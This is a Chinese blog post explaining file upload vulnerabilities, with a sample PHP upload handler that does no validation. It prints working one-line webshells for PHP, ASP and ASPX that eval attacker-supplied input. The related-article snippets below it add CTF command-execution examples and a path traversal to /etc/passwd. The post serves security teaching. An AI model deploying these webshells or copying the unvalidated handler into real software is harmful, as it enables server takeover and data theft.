文件上传漏洞概述

最新推荐文章于 2024-04-11 15:11:07 发布
最新推荐文章于 2024-04-11 15:11:07 发布
阅读量435 收藏
点赞数
分类专栏: 安全 文章标签: 网络安全 安全性测试 web安全 php 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ssslq/article/details/129345365
版权

文件漏洞上传概述

文件上传

文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,Web受攻击的风险就越大。在使用html向数据库提交数据的时候,对数据有三种编码方式:

  1. application/x-www-form-urlencoded:默认。在发送前对所有字符进行编码(将空格转换为"+"符号,特殊字符转换为ASCll HEX值)。
  2. multipart/form-data:不对字符编码。当使用有文件上传控件的表单时,该值是必需的。
  3. text/plain:将空格转换为"+”符号,但不编码特殊字符。

详细解释:
application/x-www-form-urlencoded:
表单中的enctype值如果不设置,默认是此值,将表单中的数据变为键值对的形式如果method为get,则将表单中的数据转换成一个字符串
(name1=value1&name2=value2),然后把这个字符串附加到URL后面,并用?分割如果method为post,浏览器把form数据封装到http body中,然后发送到服务器。
multipart/form-data:
专门用来传输特殊类型数据的,比如文件,会将表单中的数据变成二进制数据,这时候如果用request是无法获取到相应表单的值,应通过stream流对象,将传到服务器端的二进制数据解码,从而读取数据。
text/plain:
表单以纯文本形式进行编码。

文件上传核心代码

<?php
if(isset($_POST[ 'submit'])){        #这里使用post的方式检查是否有输入
$tmpPath=$_FILES['file' ][ 'tmp_name ' ]; #使用$files获取文件信息,然后存储在$file变量中
$path="./upload/".$_FILES['file'][ 'name ' ];  #存放文件的真正名字,前面附加路径名
    if(move_uploaded_file($tmpPath,$path)){ #函数作用是移动文件,前者移动到后者
        echo $path; #如果成功,那就打印出移动到那个目录下
    }else{     #否则打印失败
        echo "上传失败,请<a href='up.html'>返回首页</a>重新上传!";}
    }else{
        echo "您未点击提交按钮,请<a href='up.html '>返回首页</a>重新上传!";
    }
?>

文件上传漏洞

上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(包括asp.aspx、 php.jsp等)
恶意上传行为可能导致网站甚至整个服务器被控制。恶意的脚本文件又被称为WebShell,WebShell具有强大的功能,如查看服务器目录、服务器中文件、执行系统命令等。
形成原因:
文件上传漏洞的成因(复杂),一方面,Web应用开放了文件上传功能,并且对上传的文件没有进行足够的限制;另一方面,程序开发部署时候,没有考虑到系统特性和过滤不严格;再者就是,攻击者通过Web服务器解析漏洞绕过限制,导致可以上传任意文件。

文件上传漏洞危害

  1. 文件上传漏洞最直接的威胁就是上传任意文件,包括恶意脚本、可执行程序等。
  2. 如果Web 服务器所保存上传文件的可写目录具有执行权限,那么就可以直接上传后门文件,导致网站沦陷。
  3. 如果攻击者通过其他漏洞进行提权操纵,拿到系统管理权限,那么直接导致服务器沦陷。
  4. 同服务器下的其他网站无一幸免,均会被攻击者控制。

漏洞上传条件:

  1. Web 服务器要开启文件上传功能,并且上传api(接口)对外“开放’(Web 用户可以访问);
  2. Web 用户对目标目录具有可写权限,甚至具有执行权限,一般情况下Web目录都有执行权限。
  3. 要想利用文件上传漏洞,就是上传的文件可以执行,也就是Web容器可以解析我们上传的脚本,无论脚本以什么样的形式存在。

小马

小马也叫一句话木马,因为代码量比较小,就是一句简单代码。可以通过get、post,或者cookie进行信息提交,例如:
PHP: <?php @eval($_REQUEST['cmd']);?> //request获得客户端提交的信息,名字是cmd,使用@是用于不进行报错,eval是将收到的信息当作php代码进行处理。
ASP: <%eval request(“cmd”)%>
ASPX:<%@Page Language=“Jscript”%>
<%eval(Request.Item[ " cmd"],“unsafe”);%>

经典的一句话木马通常有两个部分,一部分是可执行代码的函数部分,一个是接收数据的部分。
例如:< ?php> @eval($_POST[‘cmd’]);?>
eval就是命令执行函数,POST部分负责接收数据。eval函数负责把接收来的数据当作PHP代码来执行。这样就能让插入了一句话木马的网站执行接受我们传递的任何PHP语句了。

大马

之所以叫大马,是因为与小马(一句话木与)区分开,并且代码量比较多,但是功能丰富。同样,大马有很多种脚本格式,其功能基本相同。

小刘不忙!
关注
专栏目录
html文件上传漏洞,文件上传漏洞(绕过姿势)
weixin_31857829的博客
06-07 1476
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
文件上传漏洞详解
KHOST的博客
09-09 863
文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 网站上传文件并且存储的过程: 假如某网站有一个允许用户上传图片的功能,用户上传的图片最终会被存储到 /upload/ 目录下,并且以上传文件时的时间日期命名,上传文件的后缀为后缀。小明这时上传了一个1.jpg的文件,当服务器收到用户上传的数据时,会在 /upload...
Web安全之上传漏洞
Matheus的博客
08-03 733
上传漏洞 上传漏洞介绍 在现代互联网的web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,比如企业的OA系统,允许用户上传图片、视频、头像和许多其他类型的文件。然而向用户提供的功能越多,web应用受到攻击的风险就越大,如果web应用存在文件上传漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获取网站的权限,或者进一步危害服务器。 为什么文件上传存在漏洞 上传文件时,如果服务器代码未对客户端上传的文件进行严格的验证和过滤,就容易造成可以上传任意文件的情况,包括上
文件包含漏洞
qq_30890029的博客
03-22 76
由于服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。通过../../../../../../../../etc/passwd访问到服务器配置文件。通过filename=file1.php&submit 此处有漏洞、可以通过访问任意目录。
3、任意文件上传漏洞_任意文件上传漏洞条件
最新发布
2401_83974117的博客
04-11 596
文件上传漏洞( Unrestricted File Upload)网站上传功能过滤不严格,导致用户可通过上传文件对系统造成危害。上传服务端可解析的脚本文件造成远程代码执行、上传超大文件造成拒绝服务、上传Html文件引发XSS等。Web通用漏洞严重/中危**危害:**上传文件Getshell/上传HTML文件实现XSS攻击、上传超大文件引发拒绝服务等。
【CTFHub】RCE
qq_61109509的博客
02-22 607
eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 先查看下目录 /?cmd=system('ls'); 看来这一级啥都没有,那我们看看上一级文件夹 /?cmd=system('ls /'); 打开flag,注意打开的是下一级 /?cmd=system('cat /flag_30311..
文件上传漏洞篇01文件上传漏洞的危害和文件上传的修复方案
qq_61861243的博客
04-16 548
文件上传漏洞是指由于程序员未对上传的文件进行严格的验证与过滤,而导致的用户可以越过其本身权限向服务器上传可执行的动态脚本文件。
一文概述文件上传漏洞
fansenliangren的博客
10-25 348
文件上传漏洞:是指黑客将一个可执行的文件(这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等)上传到服务器并成功执行时的漏洞,这个漏洞是最为直接和有效的,对于攻击者来说这个漏洞利用起来是很容易实施的。
安全文件上传漏洞概述
qq_42728977的博客
12-26 675
安全文件上传漏洞概述 文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器webs...
WebShell文件上传漏洞分析溯源
02-22
一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用程序的上传功能中,攻击者可以...
finecms-含有前台文件上传漏洞源码包.zip
01-04
1. **文件上传漏洞概述** 文件上传漏洞Web应用程序中常见的一种安全缺陷,它允许攻击者上传任意文件到服务器,通常这些文件可能是恶意脚本或代码。一旦文件被成功上传,攻击者可能通过执行这些文件来获取服务器...
pikachu-不安全文件上传漏洞
koala_king的博客
03-21 476
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。传一个1.php,上传失败,提示和上一关有区别,多了个上传文件后缀名不能为空,由于上传的文件是有后缀名的,也许后端代码会删掉原本的后缀名并根据一些规则替换新的后缀名?如下图所示,刚选好文件,还没有点 “开始上传” 的时候,就弹出了提示 上传的文件不符合要求。
<?php eval($_POST[cmd]);?>
xiuzhentianting的博客
09-14 9248
执行POST来的cmd参数语句,别人可以以任何内容提交,这个程序把提交的数据当PHP语句执行,利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成,例如: http://....../你的名字.php> //这里面写PHP程序,随便连接数据和修改文件都可以,当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码 $str=f
php eval一句话木马干啥的,<?php eval($_POST[cmd]);?>一句话木马解读
weixin_39875503的博客
03-09 3722
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。php网页木马header("content-Type:text/html;charset=gb2312");if(get_magic_quotes_gpc())foreach($_POSTas$k=>$v)$_POST[...
文件上传漏洞靶场upload-labs学习(pass1-pass5)
AFCC_的博客(Web_Dog)
02-18 5280
0x00 upload-labs简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。在2019年11月添加新的pass-05后关卡总数为21关。
文件上传漏洞
热门推荐
ma963852的博客
02-28 1万+
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。 文件上传漏洞一般都是指“上传Web脚本能够被服务器解析”的问题。
文件上传漏洞(绕过姿势)
苟有恒,必有三更眠,五更起。
12-28 3242
0X00 前言文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。文件上传校验姿势 客户端javascript校验(一般只校验后缀名) 服务端校验 文件头content-type字段校验(image/gif) 文件内容头校验(GIF89a) 后缀名黑名单校验 后缀名白名单校验 WAF设
html 上传文件_【实战篇】记一次文件上传漏洞绕过
weixin_39636099的博客
11-25 1131
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴大家好~最近有点高产似母猪~那今天就少写点,简单记录一个文件上传漏洞的绕过吧~(机智如我..)之前也介绍过一期文件上传漏洞:【文件上传与解析】文件上传与解析漏洞总结v1.0一起来看看今天的内容吧。Part.1漏洞挖掘漏洞测试 目标站点登陆后可以上传公司logo:先随意上传一张图片://可以看到文件被重命名了,但返回了路径。直接访问路径...
文件上传漏洞详解与Caidao防御:入门与实践
1. 文件上传漏洞概述文件上传漏洞通常发生在Web应用程序中,用户能够通过上传恶意文件,如包含恶意脚本或代码的文件,来执行未经预期的命令或者获取服务器权限。这种漏洞源于开发人员未正确验证上传文件的内容类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小刘不忙!

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值